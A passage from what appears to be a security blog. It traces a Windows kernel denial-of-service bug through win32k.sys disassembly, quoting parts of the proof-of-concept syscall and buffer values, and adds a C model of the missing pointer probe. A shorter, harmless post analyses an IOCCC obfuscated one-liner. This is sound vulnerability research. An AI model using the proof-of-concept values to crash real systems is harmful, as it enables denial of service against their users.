<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B8C jb short Exception</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B8E cmp eax, _MmUserProbeAddress</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B94 jbe short CodeOk</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B96 call _ExRaiseAccessViolation@0 ;</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">NtFindAtom is a dead end for us, so we switch the analysis to win32k.sys.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">In the PoC source code we see a call to a function named NtUserCreateWindowEx. In particular, the code issues the system call by hand: eax holds the service number 0x1157 (the 0x1000 bit selects the win32k.sys service table) and the call goes through the system call stub whose address is stored at 7FFE0300h in the shared user data page:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov eax,0x1157</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov edx,7FFE0300h</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call dword ptr[edx]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Loading win32k.sys in IDA and searching for this API, we find the function:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:BF8344E2 ; int __cdecl xxxUserCreateWindowEx(char,int,SIZE_T NumberOfBytes,int pData,int,int,int,int,int,int,int,int,int,int,int)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This function runs for a while until it reaches the following lines:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E54 mov eax, [ebp+DataBlock]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E57 test eax, 0FFFF0000h</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E5C jz short Skip</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E5E push dword ptr [eax+8]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E61 call _UserFindAtom@4 ;</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">DataBlock corresponds to the data buffer stored in the variable "c" in the PoC source code.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Since the high word of DataBlock is non-zero, the test at BF833E57 treats it as a pointer to a structure rather than as an integer atom, and the code takes the DWORD at offset 8 of that buffer. That DWORD is exactly 0xff7c98cc: the vulnerable pointer!</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
</div>
<div>
<div style="color: #1e1e1e; font-family: Verdana;">
We get into UserFindAtom, and we finally find the missing link:</div>
<div style="color: #1e1e1e; font-family: Verdana;">
<span class="Apple-style-span" style="color: black; font-family: Times;"><span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA19 mov edi, edi</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1B push ebp</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1C mov ebp, esp</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1E push ecx</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1F and [ebp+NtStatus], 0</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA23 lea eax, [ebp+NtStatus]</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA26 push eax</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA27 push [ebp+CrashPointer]</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA2A push _UserAtomTableHandle</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA30 call ds:__imp__RtlLookupAtomInAtomTable@12</span><span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;"><span class="Apple-style-span" style="color: black; font-family: Times;"> </span></span><br />
<span style="color: #1e1e1e; font-family: Verdana;">This is where win32k.sys transfers control to the vulnerable function RtlLookupAtomInAtomTable in ntkrnlpa.exe, passing the non-validated pointer along.</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;">This pointer was set in the exploit code to 0xff7c98cc, an address that falls within the kernel-space region, and the problem is that nowhere in this chain of calls is the pointer validated to make sure it is accessible. When RtlpGetIntegerAtom finally reads from it, the fault on an invalid kernel-mode address cannot be caught by the SEH frame set up by __SEH_prolog, so the machine bugchecks.</span><br />
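The following is an added example, not code from the original post nor from the Windows kernel: a user-mode C model of the two pointer checks visible in the disassembly above (the NtFindAtom probe and the `test ecx, 0FFFF0000h` integer-atom test), run against the PoC's own buffer, to show why the same value is rejected on the NtFindAtom route but reaches RtlpGetIntegerAtom through UserFindAtom. Two things are assumptions rather than facts taken from the post: MmUserProbeAddress is modelled as 0x7FFF0000, its value on 32-bit Windows without /3GB, and the "c" buffer is interpreted with win32k's LARGE_STRING layout (Length, MaximumLength/bAnsi, Buffer at offset 8), which is consistent with the `push dword ptr [eax+8]` seen in xxxUserCreateWindowEx.

```c
/*
 * Added example (not the post's code, not kernel source): a user-mode C
 * model of the pointer checks seen in the disassembly.
 *
 * Assumptions not taken from the post:
 *  - MmUserProbeAddress is 0x7FFF0000 (32-bit Windows, no /3GB);
 *  - the PoC's "c" buffer is laid out like win32k's LARGE_STRING
 *    (Length, MaximumLength/bAnsi, Buffer at offset 8).
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MM_USER_PROBE_ADDRESS 0x7FFF0000u   /* assumed 32-bit value */

/* The "c" array from the PoC, copied verbatim from the post. */
static const uint32_t poc_c[] = { 0x00000000, 0x28001500, 0xff7c98cc, 0x23ffffff };

typedef struct {
    uint32_t Length;
    uint32_t MaximumLength;   /* 31 bits of length + bAnsi flag */
    uint32_t Buffer;          /* offset 8: what xxxUserCreateWindowEx pushes */
} LARGE_STRING32;

/* Pulls the class-name pointer out of the PoC buffer the way
 * `push dword ptr [eax+8]` does. */
uint32_t poc_class_name_buffer(void)
{
    LARGE_STRING32 ls;
    memcpy(&ls, poc_c, sizeof ls);
    return ls.Buffer;
}

/* Mirrors `test ecx, 0FFFF0000h` in RtlpGetIntegerAtom (and the same test
 * on DataBlock in xxxUserCreateWindowEx): a value whose high word is zero
 * is an integer atom, anything else is treated as a pointer to a string. */
int is_integer_atom(uint32_t name)
{
    return (name & 0xFFFF0000u) == 0;
}

/* Anything at or above the probe address is not user memory. */
int is_kernel_address(uint32_t addr)
{
    return addr >= MM_USER_PROBE_ADDRESS;
}

/* Mirrors the probe in NtFindAtom:
 *   lea eax, [ecx+ebx]            ; end = ptr + len
 *   cmp eax, ecx / jb Exception   ; wrapped around -> reject
 *   cmp eax, _MmUserProbeAddress
 *   jbe CodeOk                    ; end <= probe address -> accept
 *   call _ExRaiseAccessViolation@0
 * Returns 1 if the range is acceptable user memory, 0 if the kernel
 * would raise an access violation instead of touching it. */
int probe_for_read(uint32_t ptr, uint32_t len)
{
    uint32_t end = ptr + len;                    /* uint32 wraps like lea does */
    if (end < ptr)                   return 0;   /* jb Exception */
    if (end > MM_USER_PROBE_ADDRESS) return 0;   /* fell through to ExRaiseAccessViolation */
    return 1;                                    /* jbe CodeOk */
}

enum outcome {
    OUT_INTEGER_ATOM,   /* high word zero: nothing is dereferenced */
    OUT_USER_STRING,    /* user-range pointer: a fault there is a catchable exception */
    OUT_REJECTED,       /* probe failed: access violation raised, no read performed */
    OUT_KERNEL_DEREF    /* `cmp word ptr [ecx], 23h` executed on a kernel address */
};

/* The NtFindAtom route: probe first, then hand the pointer down. */
enum outcome lookup_via_ntfindatom(uint32_t name, uint32_t len)
{
    if (is_integer_atom(name))      return OUT_INTEGER_ATOM;
    if (!probe_for_read(name, len)) return OUT_REJECTED;
    return OUT_USER_STRING;
}

/* The win32k route shown in the post: UserFindAtom passes the pointer to
 * RtlLookupAtomInAtomTable -> RtlpGetIntegerAtom with no probe at all. A
 * fault on an unmapped kernel address is not caught by the SEH frame from
 * __SEH_prolog, so OUT_KERNEL_DEREF means a bugcheck. */
enum outcome lookup_via_userfindatom(uint32_t name)
{
    if (is_integer_atom(name)) return OUT_INTEGER_ATOM;
    return is_kernel_address(name) ? OUT_KERNEL_DEREF : OUT_USER_STRING;
}

int main(void)
{
    uint32_t p = poc_class_name_buffer();
    printf("class name pointer from PoC buffer: 0x%08x\n", p);
    printf("NtFindAtom route   : %d (2 = rejected by probe)\n", lookup_via_ntfindatom(p, 2));
    printf("UserFindAtom route : %d (3 = kernel pointer dereferenced)\n", lookup_via_userfindatom(p));
    return 0;
}
```

The probe is the whole difference between the two routes: the same value, 0xff7c98cc, is turned into an access violation by NtFindAtom before any memory is touched, while UserFindAtom lets RtlpGetIntegerAtom execute `cmp word ptr [ecx], 23h` on it. Note the overflow check (`end < ptr`) as well: without it, a pointer near the top of the address space with a large length would pass the comparison against MmUserProbeAddress.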
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><span style="color: #1e1e1e; line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">usermode app</span></span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">----|------------------------------------</span>
<br />
<span style="color: #1e1e1e; line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;"> V</span></span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">xxxUserCreateWindowEx</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> |</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> V</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> </span><span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">UserFindAtom win32k.sys</span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">----|------------------------------------</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> V ntkrnlpa.exe</span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;"> RtlLookupAtomInAtomTable</span>
<br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> |</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> V</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">RtlpGetIntegerAtom</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;">This vulnerability does not seem to be exploitable for code execution; its security impact looks like a Denial of Service.</span><br />
<span style="color: #1e1e1e; font-family: Verdana;">However, we have seen that there are two potentially vulnerable functions:</span><br />
<br />
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlAddAtomToAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlLookupAtomInAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
</div>
<span style="color: #1e1e1e; font-family: Verdana;">and there are several calls from win32k.sys to them (I found 8 to UserFindAtom and 30 to UserAddAtom). Remember, these two functions do not validate the pointer they take as input, so it is the caller's responsibility to validate it.</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;">I had a quick look at all the other functions that call these two, and at first glance they seem to perform proper validation.</span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;">Thus I am not going to spend too much time on them, but if anyone wants to look and finds anything, please let me know!</span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;">P.S. As it is, the exploit won't work on 64-bit OSes (I tested Windows 7 Professional and Windows 8 Consumer Preview). This may be due to the pointers being 64-bit sized, for one thing (or maybe the win32k.sys syscall interface is not the same, I haven't checked).</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"><br /></span></div>
</span><span class="Apple-style-span" style="font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: small;">
</span>Posted by giulia (http://www.blogger.com/profile/12995367052667481710), 2012-04-30 (updated 2012-05-06): IOCCC: C code obfuscation at its best!<br />
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Finally, the International Obfuscated C
Code Contest is back, and this month the 14 winning entries
were announced! You can check their website and have a look at the
code: <a href="http://www.ioccc.org/">www.ioccc.org</a>.</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
In particular, there was one winning
entry that made me really curious: the one-liner by Taketo Konno.
Reading the code I noticed some interesting tricks and I began to
think two things: that this was a very cool entry and that it
deserved to be analyzed as well :)</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
First of all, you have to download the
C source code and its makefile, put them in the same
directory and type "make konno" to build the executable.
Then, type the following: ./konno qwerty</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
And you will get something like this:</div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="color: #274e13; font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">o o o o o o . . . .<br /> . . . . . . . . .<br /> . . . . . . .</span></div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
What is it? What does this remind you
of?</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Try with different inputs if you have
no ideas, but remember: all the inputs must be in the same form "<span style="color: #274e13;">./konno
just_a_single_argument_of_lower_case_letters</span>".</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Ok, here we are: after some attempts you
should have realized what the output is… that is… the visual representation of the keystrokes!</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Well, with this little hint we are
ready to begin our analysis. The first step consists of re-shaping
the code, in order to make it clearer and easier to understand:</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;"><br /></span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">main(_,l)</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #aa0d91; font-size: small;">char
</span><span style="font-size: small;">**l;</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">{</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> 6
</span><span style="font-size: small;">*
putchar</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;"> ( </span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">(--_
% </span><span style="color: #1c00cf; font-size: small;">20)
</span><span style="font-size: small;">?
</span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">(_
+ _ / </span><span style="color: #1c00cf; font-size: small;">21
</span><span style="font-size: small;">&
</span><span style="color: #1c00cf; font-size: small;">56
</span><span style="font-size: small;">>
_) ? </span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">strchr(</span><span style="color: #1c00cf; font-size: small;">1</span><span style="font-size: small;">[l],
_ ^ </span><span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"
</span><span style="font-size: small;">[_/</span><span style="color: #1c00cf; font-size: small;">2</span><span style="font-size: small;">])?
</span><span style="color: #1c00cf; font-size: small;"> </span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> 111
</span><span style="font-size: small;">:
</span><span style="color: #1c00cf; font-size: small;">46</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> </span><span style="font-size: small;">:</span><span style="color: #1c00cf; font-size: small;">32</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> </span><span style="font-size: small;">:</span><span style="color: #1c00cf; font-size: small;">10</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf;"><span style="font-size: small;"> </span></span><span style="font-size: small;">)</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">^
_ && main(</span><span style="color: #1c00cf; font-size: small;">2
</span><span style="font-size: small;">+
_, l);</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">}</span></div>
<div style="margin-bottom: 0cm;">
<br />
<br />
<div style="font-family: Verdana,sans-serif;">
<span style="color: #1a1a1a;"><span style="font-size: small;">Let's start by observing the structure of the code: it is a single line of code, in which the function "main" calls itself recursively:</span></span></div>
<br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1c00cf; font-size: small;">6</span><span style="color: #1a1a1a;"><span style="font-size: small;">*putchar(…)
^ _ && main(</span></span><span style="color: #1c00cf; font-size: small;">2</span><span style="color: #1a1a1a;"><span style="font-size: small;"> + _, l);</span></span></div>
</div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<span style="color: #1a1a1a; font-size: small;">The function takes the parameters "_" and "l" as the standard "argc" and "argv" respectively, and the recursion continues as long as the expression "6*putchar(…) ^ _ && main(…)" holds true, that is, as long as "6*putchar(…) ^ _" is non-zero.</span></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<span style="font-size: small;"><br /></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Pay attention to the identification of "_" with "argc", as this allows us to assume that its initial value is 2.</span><br style="font-family: Verdana,sans-serif;" /><br style="font-family: Verdana,sans-serif;" /><span style="font-family: Verdana, sans-serif;">Now, if you take a deeper look at the source code, you will recognize the following construct:</span></span><br />
<br /><span style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;">(exp) ? true : false;</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;"> </span></span><br /><span style="font-family: Verdana, sans-serif; font-size: small;">appearing three times (nested). So this whole code is one big loop, and the nested operators, which all sit inside the "putchar", must control which char is output in each iteration. </span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-family: Verdana, sans-serif; font-size: small;">Let's start from the first ternary operator:</span></span><br />
<br />
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">(--_
% </span><span style="color: #1c00cf; font-size: small;">20)
</span><span style="font-size: small;">? ... :</span><span style="color: #1c00cf; font-size: small;">10</span>
</div>
<br />
<span style="color: #1e1e1e; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;">This one, when false, returns the value 10 (0x0A in hex), which is the ASCII value for "\n" (it moves the cursor to the following line). How does it work exactly?</span></span><br />
<br />
<span style="color: #1e1e1e; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;">The variable "_" is actually used as the counter of the main big loop, and it goes up by one at every iteration: the recursion ( </span></span><span style="color: #1a1a1a; font-family: Verdana, sans-serif;"><span style="font-size: small;">main(</span></span><span style="color: #1c00cf; font-family: Verdana, sans-serif; font-size: small;">2</span><span style="color: #1a1a1a; font-family: Verdana, sans-serif;"><span style="font-size: small;"> + _, l) </span></span><span style="color: #1a1a1a; font-family: Verdana, sans-serif;"><span style="font-size: small;">)</span></span><span style="font-family: Verdana, sans-serif;"> </span><span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">adds two, and the "--" in the above expression takes one away. Every time the counter is a multiple of 20, the condition of the ternary operator evaluates to false, causing the code to output a "\n" char.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">This handles the division of the output into lines, but what about the rest? Well, we can now look at what happens when the above ternary operator evaluates to true (that is, in every iteration where the counter is not a multiple of 20):</span></span></span><br />
